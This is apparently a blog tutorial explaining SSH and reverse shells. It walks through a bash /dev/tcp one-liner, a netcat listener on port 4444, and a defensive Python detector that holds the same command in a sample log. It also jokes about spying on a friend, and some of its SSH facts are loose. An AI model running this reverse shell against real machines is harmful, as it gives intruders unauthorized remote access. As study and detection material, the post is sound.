Reverse Shell: Hands-on Introduction


Most of us are already familiar with SSH—but if not, no worries; I’ll start with a quick intro so we’re all on the same page. After that, we’ll dive into what a reverse shell is, how it functions, why it’s such an intriguing concept, and explore potential ways to improve it. Let’s jump right in!

What’s SSH?

Imagine this situation: you and your friend each have your own laptop, and you want to connect to his laptop wirelessly to access his system, perhaps to get his files, load something onto it, or even install a keylogger that records every key he types and transmits it to your system so you can snitch on him. To achieve any of this you first need a connection to his system (preferably wireless), and this is where SSH comes in: in simple terms, it lets you connect to any system that is reachable over the internet or has a public IP. With that introduction, SSH stands for Secure Shell.

Flow of SSH is as follows:

  1. Both systems need an IP address, and you must know the other system's IP.

  2. You must know a user password on the other system.

  3. With this information you can initiate the SSH connection from your system with something like
    ssh <username>@<IP> and, if everything goes right, it prompts for the password and logs you into the system.

Let's look at SSH from the security point of view. Considering the "meta-steps", that is, the information required before the connection can be established (the other system's public IP, a username, a password, and an open port), we can see that it is pretty secure, and from the SSH perspective that standard has to be maintained: around 20 million users use SSH every day, and any kind of vulnerability would break their systems. One more point before introducing the reverse shell: in any SSH session the connection is initiated from the user's system and has to be accepted on the other side (which is much more complex than just saying YES, of course).

Reverse Shell

With the above information processed, let me introduce what a reverse shell is, how it differs from a normal shell, and how, if done properly, it lets you "hack" into the other system.

A reverse shell breaks the fundamental rule of SSH by establishing the connection from the target system to the host system instead of from the host system to the target system. This might look like a minor difference, but think about it: now you don't have to know the credentials of the target system to initiate the connection, you just have to make them start the connection (knowingly or unknowingly 😉). There are ways to do that; this is called Social Engineering and is a different topic to discuss.

Advantages of Reverse shell

As mentioned above, making the connection from the target system turns our own system into the "target" of the connection, and now it is easy to make the connection because we know everything about our own system.

Flow of Reverse shell:

  1. Make some port on our device start listening (e.g. make port 4444 accept any traffic coming from the internet, or even just a plain TCP connection).

  2. On the target device, run the command which makes their system send a connection request to our system (this is simple, because the target of the connection is now our own system and we know the parameters to pass).

  3. If everything goes right, we will have a standard input entry box for the target on our system.

Reverse shell: Hands On

Enabling port listening on our device

As mentioned in the first step, let us open a port on our device.

Here I used Netcat on an EC2 instance to implement the reverse shell connection. Install netcat (it should also work if nmap is installed, since nmap ships its own ncat).

Now, coming to the target device, we just need to run a single command there to establish the connection.

Explanation:

  • /bin/bash -i: starts an interactive bash shell.

  • >& /dev/tcp/<Public-IP>/<PORT>: redirects both stdout and stderr to a TCP connection to the specified IP and port (bash implements /dev/tcp/<host>/<port> internally; it is not a real file).

  • 0>&1: redirects stdin to the same place as stdout, so whatever the listener types reaches the shell.

  • Of course the IPs are changed and will be different in every case.

Once the command is executed, we should see something like the below on the other system; just to verify, I executed whoami and it returned my local system's username.

From this I was able to create a reverse connection to my system, but remember that this is not a proper shell session: it just redirects the shell's stdout and stderr to the foreign system, and this is the biggest bottleneck of this process.
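From the defender's side, the command explained above has a very recognisable shape. The following is an added example, not code from the original post: a small Python check that flags /dev/tcp reverse-shell indicators in a constructed sample of audit-style command lines (the log format and addresses are assumptions).

```python
"""Flag bash /dev/tcp reverse-shell one-liners in a command log (defensive check)."""
import re
from typing import Optional

# The pieces explained above: a shell started with -i, stdout/stderr sent to
# /dev/tcp/<ip>/<port>, and stdin tied back to the socket with 0>&1.
DEV_TCP_RE = re.compile(r"/dev/tcp/(?P<ip>(?:\d{1,3}\.){3}\d{1,3})/(?P<port>\d{1,5})")
INTERACTIVE_SHELL_RE = re.compile(r"(?:^|[\s/])(?:bash|sh|zsh)\s+-i\b")
STDIN_REDIRECT_RE = re.compile(r"0\s*>&\s*1")


def classify(cmdline: str) -> Optional[dict]:
    """Return indicator details if cmdline uses /dev/tcp, else None.

    score 1: any /dev/tcp use (rare in normal workloads, worth a look)
    score 3: interactive shell + stdin redirect, i.e. the full reverse shell
    """
    m = DEV_TCP_RE.search(cmdline)
    if not m:
        return None
    score = 1
    if INTERACTIVE_SHELL_RE.search(cmdline):
        score += 1
    if STDIN_REDIRECT_RE.search(cmdline):
        score += 1
    return {"ip": m.group("ip"), "port": int(m.group("port")), "score": score}


def scan_log(lines):
    """Yield (line_number, finding) for every suspicious command line."""
    for n, line in enumerate(lines, 1):
        hit = classify(line)
        if hit:
            yield n, hit


# Constructed sample of audit-style command lines (assumed format, not real data).
SAMPLE_LOG = [
    'uid=1000 cmd="ls -la /home/alice"',
    'uid=1000 cmd="/bin/bash -i >& /dev/tcp/203.0.113.10/4444 0>&1"',
    'uid=1000 cmd="cat /dev/tcp/203.0.113.10/80"',
    'uid=1000 cmd="ssh alice@203.0.113.10"',
]

if __name__ == "__main__":
    for n, hit in scan_log(SAMPLE_LOG):
        print(f"line {n}: /dev/tcp to {hit['ip']}:{hit['port']} (score {hit['score']})")
```

In a real deployment the same check would run over process-creation events (auditd execve records, for instance) rather than a static list, and a score of 3 is the case worth alerting on immediately.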

Conclusion:

In summary, SSH (Secure Shell) is a powerful protocol that allows secure remote access to systems over a network. It requires knowledge of the target system's public IP, username, and password, making it a secure method for remote administration. The security measures in place, such as encryption and authentication, ensure that the connection is protected from unauthorized access.

On the other hand, a reverse shell flips the traditional SSH connection model by initiating the connection from the target system back to the attacker's system. This method can bypass some security measures, as it does not require the attacker to know the target's credentials. Instead, the attacker must trick the target system into executing a command that establishes the connection, often through social engineering techniques. There is a lot of room for improvement in this technique; I feel that something could be built on a simple TCP session as well, and the paths are endless.

Key Points:

  • Security of SSH: SSH is widely used and considered secure due to its encryption and authentication mechanisms. It is essential for protecting sensitive data and maintaining system integrity.

  • Reverse Shell Mechanics: A reverse shell allows an attacker to gain access to a target system without needing credentials, making it a potent tool for exploitation.

  • Listening Port: Setting up a listening port on the attacker's machine is crucial for receiving the connection from the target system.

  • Limitations: While a reverse shell can provide access, it often lacks the full functionality of a standard shell session, which can limit the attacker's capabilities.

I hope you don't go through your friend's device and take their personal information, but hey, they might already be doing this on your system, who knows 😉.


Written by

vishal manikanta
